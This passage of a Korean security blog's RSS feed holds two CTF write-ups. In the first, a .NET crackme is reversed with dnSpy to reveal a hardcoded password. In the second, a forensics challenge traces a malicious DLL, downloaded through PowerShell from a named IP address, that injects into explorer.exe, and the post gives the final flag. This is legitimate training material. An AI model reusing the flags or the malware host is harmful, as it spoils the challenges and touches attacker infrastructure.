&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;233&quot; data-origin-height=&quot;82&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cyI9Ns/btsFNb1uccm/lqz93P3hThPdaNatQ2FFH1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cyI9Ns/btsFNb1uccm/lqz93P3hThPdaNatQ2FFH1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cyI9Ns/btsFNb1uccm/lqz93P3hThPdaNatQ2FFH1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcyI9Ns%2FbtsFNb1uccm%2Flqz93P3hThPdaNatQ2FFH1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;233&quot; height=&quot;82&quot; data-origin-width=&quot;233&quot; data-origin-height=&quot;82&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;실행시켜보면 이런 화면이 나온다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;간단하게 비밀번호 같은거 입력하는 창이 나오는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;250&quot; data-origin-height=&quot;163&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/0nWQ4/btsFLVZpksA/Qn3fW85ppIkHszgfQKDOk1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/0nWQ4/btsFLVZpksA/Qn3fW85ppIkHszgfQKDOk1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/0nWQ4/btsFLVZpksA/Qn3fW85ppIkHszgfQKDOk1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F0nWQ4%2FbtsFLVZpksA%2FQn3fW85ppIkHszgfQKDOk1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;250&quot; height=&quot;163&quot; data-origin-width=&quot;250&quot; data-origin-height=&quot;163&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;잘못된 값을 입력하면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이렇게 Try again! 이 나온다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;429&quot; data-origin-height=&quot;120&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/coDnXA/btsFMrDQIbl/KrfHvt3ENe6TQi8V3v8iL0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/coDnXA/btsFMrDQIbl/KrfHvt3ENe6TQi8V3v8iL0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/coDnXA/btsFMrDQIbl/KrfHvt3ENe6TQi8V3v8iL0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcoDnXA%2FbtsFMrDQIbl%2FKrfHvt3ENe6TQi8V3v8iL0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;429&quot; height=&quot;120&quot; data-origin-width=&quot;429&quot; data-origin-height=&quot;120&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;처음엔 IDA로 분석을 해보려했는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Microsoft.NET assembly 파일인것 같아서&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;다른 도구를 사용해보기로 했다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure id=&quot;og_1710399453183&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;object&quot; data-og-title=&quot;Releases &amp;middot; dnSpy/dnSpy&quot; data-og-description=&quot;.NET debugger and assembly editor. Contribute to dnSpy/dnSpy development by creating an account on GitHub.&quot; data-og-host=&quot;github.com&quot; data-og-source-url=&quot;https://github.com/dnSpy/dnSpy/releases&quot; data-og-url=&quot;https://github.com/dnSpy/dnSpy/releases&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/7fxT5/hyVxBKXHIJ/DXyVY4nqqQ83Lb6HgYjEkk/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600&quot;&gt;&lt;a href=&quot;https://github.com/dnSpy/dnSpy/releases&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://github.com/dnSpy/dnSpy/releases&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/7fxT5/hyVxBKXHIJ/DXyVY4nqqQ83Lb6HgYjEkk/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Releases &amp;middot; dnSpy/dnSpy&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;.NET debugger and assembly editor. Contribute to dnSpy/dnSpy development by creating an account on GitHub.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;github.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Microsoft.NET 일경우&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;dnSpy 라는 도구를 사용하면 편하다&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;따로 설치는 필요없고 압축만 풀어주면 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;331&quot; data-origin-height=&quot;493&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/QmMxM/btsFK4ii3MM/Q0AjTxje01lDCznl4mePkk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/QmMxM/btsFK4ii3MM/Q0AjTxje01lDCznl4mePkk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/QmMxM/btsFK4ii3MM/Q0AjTxje01lDCznl4mePkk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FQmMxM%2FbtsFK4ii3MM%2FQ0AjTxje01lDCznl4mePkk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;331&quot; height=&quot;493&quot; data-origin-width=&quot;331&quot; data-origin-height=&quot;493&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;dnSpy 를 실행시켜서&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;문제파일을 열어주면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;WindowsFormsApplication3 라는 항목이 생긴다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;여기 하위항목의 Form1 부분을 찾아가면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;939&quot; data-origin-height=&quot;646&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Q2ifv/btsFM9CBkvO/zRkuXKVvg0yjcs8VW1fe21/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Q2ifv/btsFM9CBkvO/zRkuXKVvg0yjcs8VW1fe21/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Q2ifv/btsFM9CBkvO/zRkuXKVvg0yjcs8VW1fe21/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FQ2ifv%2FbtsFM9CBkvO%2FzRkuXKVvg0yjcs8VW1fe21%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;939&quot; height=&quot;646&quot; data-origin-width=&quot;939&quot; data-origin-height=&quot;646&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이렇게 소스코드를 볼 수 있는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;친절하게도 가운데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;비밀번호와(b) Authkey가 적혀있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 값으로 인증을하면 문제가 풀린다.&lt;/p&gt;</description>
      <category>워게임/SuNiNaTaS</category>
      <category>CTF</category>
      <category>dnSpy</category>
      <category>reversing</category>
      <category>리버싱</category>
      <category>사이버</category>
      <category>워게임</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>해킹</category>
      <category>해킹대회</category>
      <author>SecurityMan</author>
      <guid isPermaLink="true">https://hackingstudypad.tistory.com/717</guid>
      <comments>https://hackingstudypad.tistory.com/717#entry717comment</comments>
      <pubDate>Tue, 19 Mar 2024 11:00:16 +0900</pubDate>
    </item>
    <item>
      <title>[2022 화이트햇 콘테스트 본선] E-3 - 포렌식 / Sysmon View</title>
      <link>https://hackingstudypad.tistory.com/716</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;e-3.PNG&quot; data-origin-width=&quot;477&quot; data-origin-height=&quot;488&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/BjGdR/btsFLsJTlaa/y4dlO7Ox3wjwjuvYGCWM81/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/BjGdR/btsFLsJTlaa/y4dlO7Ox3wjwjuvYGCWM81/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/BjGdR/btsFLsJTlaa/y4dlO7Ox3wjwjuvYGCWM81/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FBjGdR%2FbtsFLsJTlaa%2Fy4dlO7Ox3wjwjuvYGCWM81%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;477&quot; height=&quot;488&quot; data-filename=&quot;e-3.PNG&quot; data-origin-width=&quot;477&quot; data-origin-height=&quot;488&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;2022 화이트햇 콘테스트 본선에 출제되었던 문제&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;이전 E-2 문제와 이어지는 문제이다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;(&lt;a href=&quot;https://hackingstudypad.tistory.com/712&quot;&gt;https://hackingstudypad.tistory.com/714&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;)&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;revenue_unit_wrap&quot;&gt;
  &lt;div class=&quot;revenue_unit_item adsense responsive&quot;&gt;
    &lt;div class=&quot;revenue_unit_info&quot;&gt;반응형&lt;/div&gt;
    &lt;script src=&quot;//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js&quot; async=&quot;async&quot;&gt;&lt;/script&gt;
    &lt;ins class=&quot;adsbygoogle&quot; style=&quot;display: block;&quot; data-ad-host=&quot;ca-host-pub-9691043933427338&quot; data-ad-client=&quot;ca-pub-6369827649108732&quot; data-ad-format=&quot;auto&quot;&gt;&lt;/ins&gt;
    &lt;script&gt;(adsbygoogle = window.adsbygoogle || []).push({});&lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;E-3문제는&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;악성코드가 DLL Injection을 수행하는데&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;이때 Injection의 대상이 되는 정상 프로세스의 이름과&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;최초로 Attach 한&amp;nbsp; PPID가 무엇인지 알아내는것이 목표이다.&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;687&quot; data-origin-height=&quot;363&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/rJltY/btsFNmBMqnc/7AXkRqpLaLeV1qSb5pytOK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/rJltY/btsFNmBMqnc/7AXkRqpLaLeV1qSb5pytOK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/rJltY/btsFNmBMqnc/7AXkRqpLaLeV1qSb5pytOK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FrJltY%2FbtsFNmBMqnc%2F7AXkRqpLaLeV1qSb5pytOK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;687&quot; height=&quot;363&quot; data-origin-width=&quot;687&quot; data-origin-height=&quot;363&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;지난 문제에서&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;prob_b 이미지 내에 있는&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;FXSSVC.dll 악성코드를 식별했었다.&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;575&quot; data-origin-height=&quot;81&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Gh51F/btsFM84KSt3/eeNKpsWFky9HkkikizW4p0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Gh51F/btsFM84KSt3/eeNKpsWFky9HkkikizW4p0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Gh51F/btsFM84KSt3/eeNKpsWFky9HkkikizW4p0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FGh51F%2FbtsFM84KSt3%2FeeNKpsWFky9HkkikizW4p0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;575&quot; height=&quot;81&quot; data-origin-width=&quot;575&quot; data-origin-height=&quot;81&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;해당 악성코드는 파워쉘 코드를 통해&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;http://15.165.18.103/api 로부터 다운받은 것이었다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;575&quot; data-origin-height=&quot;125&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/EIWrq/btsFOGfb6vs/GtsGXRg4qPg0piIqEtggJk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/EIWrq/btsFOGfb6vs/GtsGXRg4qPg0piIqEtggJk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/EIWrq/btsFOGfb6vs/GtsGXRg4qPg0piIqEtggJk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FEIWrq%2FbtsFOGfb6vs%2FGtsGXRg4qPg0piIqEtggJk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;575&quot; height=&quot;125&quot; data-origin-width=&quot;575&quot; data-origin-height=&quot;125&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;IDA 도구를 이용해&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;FXSSVC.dll 파일을 열어 분석해보면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;DLL Injection 대상 프로세스는&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;explorer.exe 임을 알아낼 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;653&quot; data-origin-height=&quot;618&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/SATh9/btsFOiZWARj/4zXnpfG40JmIjpE2YrElvk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/SATh9/btsFOiZWARj/4zXnpfG40JmIjpE2YrElvk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/SATh9/btsFOiZWARj/4zXnpfG40JmIjpE2YrElvk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FSATh9%2FbtsFOiZWARj%2F4zXnpfG40JmIjpE2YrElvk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;653&quot; height=&quot;618&quot; data-origin-width=&quot;653&quot; data-origin-height=&quot;618&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;sysmon view 도구를 이용해&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;prob_b 이미지에서 추출한 sysmon 로그를 분석해본다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;explorer.exe를 검색하면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;sysmon 로그가 생성되어 있는게 보인다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;380&quot; data-origin-height=&quot;174&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/zumO3/btsFMNzLrbv/4lH5xldoBceu4K0KcaevK0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/zumO3/btsFMNzLrbv/4lH5xldoBceu4K0KcaevK0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/zumO3/btsFMNzLrbv/4lH5xldoBceu4K0KcaevK0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FzumO3%2FbtsFMNzLrbv%2F4lH5xldoBceu4K0KcaevK0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;380&quot; height=&quot;174&quot; data-origin-width=&quot;380&quot; data-origin-height=&quot;174&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;빨간 네모를 더블클릭해서&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;세부 내용을 확인해보면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;거기서 PPID를 확인할 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;따라서 이번 문제의 플래그는&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;FLAG{EXPLORER.EXE_3904} 가 된다.&lt;/p&gt;</description>
      <category>CTF/포렌식</category>
      <category>CTF</category>
      <category>forensics</category>
      <category>sysmonview</category>
      <category>사이버</category>
      <category>워게임</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>포렌식</category>
      <category>해킹</category>
      <category>해킹대회</category>
      <author>SecurityMan</author>
      <guid isPermaLink="true">https://hackingstudypad.tistory.com/716</guid>
      <comments>https://hackingstudypad.tistory.com/716#entry716comment</comments>
      <pubDate>Sat, 16 Mar 2024 11:00:55 +0900</pubDate>
    </item>
    <item>
      <title>[SuNiNaTaS] Challenge9 - 리버싱 / IDA</title>
      <link>https://hackingstudypad.tistory.com/715</link>
